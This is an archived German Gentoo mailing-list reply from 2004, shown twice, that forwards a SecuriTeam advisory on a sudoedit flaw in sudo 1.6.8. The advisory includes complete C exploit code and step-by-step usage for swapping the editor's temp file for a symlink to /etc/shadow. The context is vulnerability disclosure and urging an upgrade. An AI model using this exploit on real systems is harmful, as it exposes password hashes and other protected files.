Re: [gentoo-user-de] sudo Version und Bug ? - gentoo-user-de

From:	Dominik Elsbroek <Dominik.Elsbroek@×××××××××××××.de>
To:	gentoo-user-de@l.g.o
Subject:	Re: [gentoo-user-de] sudo Version und Bug ?
Date:	Tue, 05 Oct 2004 13:26:17
Message-Id:	`4162A0F7.7000207@UP-Consulting.de`
In Reply to:	Re: [gentoo-user-de] sudo Version und Bug ? by Christoph Probst

1

Christoph Probst wrote:

2

> Hallo.

3

>

4

> Dominik Elsbroek schrieb am 05.10.2004 um 14:53 Uhr:

5

>

6

>

7

>>ich habe ein mehr oder minder schweres Problem mit sudo. Mit der Option

8

>>-u ist es einem Angreifer möglich den mit dem sudo Befehl Dateien zu

9

>>lesen auf jene er eigentlich keinen Zugriff haben sollte.

10

>

11

>

12

> Das ist doch genau der Zweck von sudo. Was wurde diesem Benutzer denn in der

13

> /etc/sudoers (benutze visudo zum bearbeiten) erlaubt? Wenn dort nichts

14

> aktiviert ist (also alles ein "#" davor hat), dann ist es eventuell wirklich

15

> ein Bug. Ansonsten tippe ich erstmal auf Konfigurationsfehler.

16

>

17

> Es gibt zwar ein aktuelles Sicherheitsproblem bei sudo, aber das ist mehr

18

> theoretisch: http://www.sudo.ws/sudo/alerts/sudoedit.html

19

>

20

> Im Changelog ab Version 1.6.7p5 kann ich ansonsten nichts verdaechtiges

21

> finden. Allerdings schon richtig: Ein Update auf 1.6.8p1 waere mal Zeit.

22

>

23

>

24

> Chris

25

>

26

27

Hm... also wenn es ein config Fehler gewesen wäre haette ich nicht 

28

gesagt: es gibt ein Bug... sogar zwei

29

30

folgende Meldung bekam ich per mail:

31

32

The following security advisory is sent to the securiteam mailing list, 

33

and can be found at the SecuriTeam web site: http://www.securiteam.com

34

- - promotion

35

36

The SecuriTeam alerts list - Free, Accurate, Independent.

37

38

Get your security news from a reliable source.

39

http://www.securiteam.com/mailinglist.html

40

41

- - - - - - - - -

   Sudo -u Parameter File Exposure

46

------------------------------------------------------------------------

47

48

49

SUMMARY

50

51

  <http://www.sudo.ws/sudo/sudo.html> Sudo (superuser do) allows a system

52

administrator to give certain users (or groups of users) the ability to

53

run some (or all) commands as root or another user while logging the

54

commands and arguments.

55

56

A flaw in exists in sudo's -u option (aka sudoedit) that can give an

57

attacker read permission to a file that would otherwise be unreadable.

58

59

DETAILS

60

61

Vulnerable Systems:

62

  * sudo 1.6.8 and prior

63

64

Immune Systems:

65

  * sudo version 1.6.8p1 and newer

66

67

While sudoedit runs the actual editor as the invoking user, the temporary

68

file is then re-opened with root privileges. An attacker can run sudoedit,

69

remove the editor temporary file, make a link to an unreadable file with

70

the same name as the old temporary file and quit the editor. The file

71

being edited via sudoedit will now contain a copy of the previously

72

unreadable file.

73

74

Impact:

75

Exploitation of the bug requires that the sudoers file be configured to

76

allow the attacker to run sudoedit. If no users have been granted access

77

to sudoedit there is no impact.

78

79

Fix:

80

The bug is fixed in sudo 1.6.8p1.

81

82

Exploit:

83

/*

84

85

     Copyright   Rosiello Security 2004

86

           http://www.rosiello.org

87

88

                   sudoedit Exploit

89

90

91

SOFTWARE : sudoedit

92

REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html

93

DATE: 18/09/2004

94

95

Summary:

96

A flaw in exists in sudo's -u option (aka sudoedit)

97

in sudo version 1.6.8 that can give an attacker

98

read permission to a file that would otherwise be

99

unreadable.

100

101

Sudo versions affected:

102

1.6.8 only

103

104

Credit:

105

Reznic Valery discovered the problem.

106

107

-----------------------------------------------------------

108

109

All the information that you can find in this software

110

were published for educational and didactic purpose only.

111

The author published this program under the condition

112

that is not in the intention of the reader to use them

113

in order to bring to himself or others a profit or to bring

114

to others damage.

115

116

!Respect the law!

117

118

How do I use this code ?

119

120

To exploit sudoedit you have to open with it the

121

file "rosiello" as shown in the example.

122

123

EXAMPLE SCENARIO:

124

125

1) Open two shells (i) and (ii);

126

2) (i)$sudoedit rosiello;

127

3) (ii)$./sudoedit-exploit /etc/shadow;

128

4) (i) close sudoedit.

129

130

The file "rosiello" is now a copy of "/etc/shadow".

131

132

AUTHOR : Angelo Rosiello

133

CONTACT: angelo@××××××××.org

134

135

*/

136

137

#include <stdio.h>

138

#include <sys/stat.h>

139

#include <string.h>

140

#include <sys/types.h>

141

#include <fcntl.h>

142

#include <dirent.h>

143

144

145

int main( int argc, char *argv[] )

146

{

147

  char PATH[]="/usr/tmp";

148

  char file[32];

149

         DIR *tmp;

150

         struct dirent *de;

151

  int found = 0;

152

153

  printf( "Copyright   Rosiello Security 2004\n" );

154

  printf( "http://www.rosiello.org\n" );

155

156

  if( argc!=2 )

157

{

158

   printf( "USAGE: %s file\n", argv[0] );

159

   return( -1 );

160

}

161

162

163

  tmp = opendir ( PATH );

164

  while ( !found && (de = readdir ( tmp ))!= NULL )

165

{

166

   if ( (strstr(de->d_name, "rosiello") != NULL) )

167

{

168

    if( strlen(de->d_name) > 22 ) return( -1 );

169

    sprintf( file, "%s/%s", PATH, (char *)de->d_name );

170

    remove( file );

171

    if( fork()!=0 )

172

{

173

     execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );

174

}

175

    wait( );

176

    printf( "Now you can close sudoedit and reopen rosiello!\n" );

177

    found=1;

178

179

}

180

181

}

182

  closedir( tmp );

183

184

  if( !found )

185

   printf( "File Not Found!\n" );

186

  return( 0 );

187

188

}

189

190

Gruß Dominik

191

192

--

193

gentoo-user-de@g.o mailing list

Gentoo Archives: gentoo-user-de

Replies

1	Christoph Probst wrote:
2	> Hallo.
3	>
4	> Dominik Elsbroek schrieb am 05.10.2004 um 14:53 Uhr:
5	>
6	>
7	>>ich habe ein mehr oder minder schweres Problem mit sudo. Mit der Option
8	>>-u ist es einem Angreifer möglich den mit dem sudo Befehl Dateien zu
9	>>lesen auf jene er eigentlich keinen Zugriff haben sollte.
10	>
11	>
12	> Das ist doch genau der Zweck von sudo. Was wurde diesem Benutzer denn in der
13	> /etc/sudoers (benutze visudo zum bearbeiten) erlaubt? Wenn dort nichts
14	> aktiviert ist (also alles ein "#" davor hat), dann ist es eventuell wirklich
15	> ein Bug. Ansonsten tippe ich erstmal auf Konfigurationsfehler.
16	>
17	> Es gibt zwar ein aktuelles Sicherheitsproblem bei sudo, aber das ist mehr
18	> theoretisch: http://www.sudo.ws/sudo/alerts/sudoedit.html
19	>
20	> Im Changelog ab Version 1.6.7p5 kann ich ansonsten nichts verdaechtiges
21	> finden. Allerdings schon richtig: Ein Update auf 1.6.8p1 waere mal Zeit.
22	>
23	>
24	> Chris
25	>
26
27	Hm... also wenn es ein config Fehler gewesen wäre haette ich nicht
28	gesagt: es gibt ein Bug... sogar zwei
29
30	folgende Meldung bekam ich per mail:
31
32	The following security advisory is sent to the securiteam mailing list,
33	and can be found at the SecuriTeam web site: http://www.securiteam.com
34	- - promotion
35
36	The SecuriTeam alerts list - Free, Accurate, Independent.
37
38	Get your security news from a reliable source.
39	http://www.securiteam.com/mailinglist.html
40
41	- - - - - - - - -
42
43
44
45	Sudo -u Parameter File Exposure
46	------------------------------------------------------------------------
47
48
49	SUMMARY
50
51	<http://www.sudo.ws/sudo/sudo.html> Sudo (superuser do) allows a system
52	administrator to give certain users (or groups of users) the ability to
53	run some (or all) commands as root or another user while logging the
54	commands and arguments.
55
56	A flaw in exists in sudo's -u option (aka sudoedit) that can give an
57	attacker read permission to a file that would otherwise be unreadable.
58
59	DETAILS
60
61	Vulnerable Systems:
62	* sudo 1.6.8 and prior
63
64	Immune Systems:
65	* sudo version 1.6.8p1 and newer
66
67	While sudoedit runs the actual editor as the invoking user, the temporary
68	file is then re-opened with root privileges. An attacker can run sudoedit,
69	remove the editor temporary file, make a link to an unreadable file with
70	the same name as the old temporary file and quit the editor. The file
71	being edited via sudoedit will now contain a copy of the previously
72	unreadable file.
73
74	Impact:
75	Exploitation of the bug requires that the sudoers file be configured to
76	allow the attacker to run sudoedit. If no users have been granted access
77	to sudoedit there is no impact.
78
79	Fix:
80	The bug is fixed in sudo 1.6.8p1.
81
82	Exploit:
83	/*
84
85	Copyright Rosiello Security 2004
86	http://www.rosiello.org
87
88	sudoedit Exploit
89
90
91	SOFTWARE : sudoedit
92	REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
93	DATE: 18/09/2004
94
95	Summary:
96	A flaw in exists in sudo's -u option (aka sudoedit)
97	in sudo version 1.6.8 that can give an attacker
98	read permission to a file that would otherwise be
99	unreadable.
100
101	Sudo versions affected:
102	1.6.8 only
103
104	Credit:
105	Reznic Valery discovered the problem.
106
107	-----------------------------------------------------------
108
109	All the information that you can find in this software
110	were published for educational and didactic purpose only.
111	The author published this program under the condition
112	that is not in the intention of the reader to use them
113	in order to bring to himself or others a profit or to bring
114	to others damage.
115
116	!Respect the law!
117
118	How do I use this code ?
119
120	To exploit sudoedit you have to open with it the
121	file "rosiello" as shown in the example.
122
123	EXAMPLE SCENARIO:
124
125	1) Open two shells (i) and (ii);
126	2) (i)$sudoedit rosiello;
127	3) (ii)$./sudoedit-exploit /etc/shadow;
128	4) (i) close sudoedit.
129
130	The file "rosiello" is now a copy of "/etc/shadow".
131
132	AUTHOR : Angelo Rosiello
133	CONTACT: angelo@××××××××.org
134
135	*/
136
137	#include <stdio.h>
138	#include <sys/stat.h>
139	#include <string.h>
140	#include <sys/types.h>
141	#include <fcntl.h>
142	#include <dirent.h>
143
144
145	int main( int argc, char *argv[] )
146	{
147	char PATH[]="/usr/tmp";
148	char file[32];
149	DIR *tmp;
150	struct dirent *de;
151	int found = 0;
152
153	printf( "Copyright Rosiello Security 2004\n" );
154	printf( "http://www.rosiello.org\n" );
155
156	if( argc!=2 )
157	{
158	printf( "USAGE: %s file\n", argv[0] );
159	return( -1 );
160	}
161
162
163	tmp = opendir ( PATH );
164	while ( !found && (de = readdir ( tmp ))!= NULL )
165	{
166	if ( (strstr(de->d_name, "rosiello") != NULL) )
167	{
168	if( strlen(de->d_name) > 22 ) return( -1 );
169	sprintf( file, "%s/%s", PATH, (char *)de->d_name );
170	remove( file );
171	if( fork()!=0 )
172	{
173	execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );
174	}
175	wait( );
176	printf( "Now you can close sudoedit and reopen rosiello!\n" );
177	found=1;
178
179	}
180
181	}
182	closedir( tmp );
183
184	if( !found )
185	printf( "File Not Found!\n" );
186	return( 0 );
187
188	}
189
190	Gruß Dominik
191
192	--
193	gentoo-user-de@g.o mailing list